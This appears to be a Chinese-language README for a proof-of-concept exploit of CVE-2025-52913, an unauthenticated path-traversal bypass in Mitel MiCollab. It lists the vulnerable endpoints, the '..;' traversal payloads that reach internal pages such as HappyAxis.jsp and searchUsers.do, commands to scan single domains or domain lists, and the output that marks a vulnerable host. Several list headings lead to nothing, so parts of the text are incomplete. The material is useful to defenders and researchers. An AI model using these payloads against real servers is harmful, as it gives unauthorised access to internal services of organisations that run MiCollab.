本仓库包含 CVE-2025-52913 的概念验证 (PoC) 代码,该漏洞影响 Mitel MiCollab 的路径规范化功能。
此问题允许未经身份验证的攻击者通过利用精心构造的 URL 序列(例如 ..;)绕过预期的路径限制,从而访问内部应用程序端点。
成功利用可能导致:
该漏洞可通过以下路径触发:
/npm-pwg/loginForm.jsp/
/npm-pwg/extendedUmPlayMessage.jsp/
/npm-admin/showLoginPage.do/
/npm-admin/login.do/
示例遍历载荷:
/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp
/..;/..;/usp/searchUsers.do
pip install -r requirements.txt
python3 POC-CVE-2025-52913.py example.com
python3 POC-CVE-2025-52913.py domains.txt
[*] Testing http://example.com
[+] http://example.com/npm-pwg/loginForm.jsp/..;/..;/axis2-AWC/axis2-web/HappyAxis.jsp - 200
[!] Possible success
如果满足以下条件,则目标可能存在漏洞:
服务器响应 HTTP 200
响应中包含:
Axis2Axis2 Happiness Page该漏洞源于对包含 ..; 的构造路径未进行正确的规范化处理,从而允许遍历到预期应用程序上下文之外。
此行为可能暴露内部服务,例如:
由 Dahmani Toumi 发现
本项目仅供 教育目的和授权的安全测试 使用。
未经明确许可,请勿将此工具用于任何系统。 作者对任何滥用或损害不承担责任。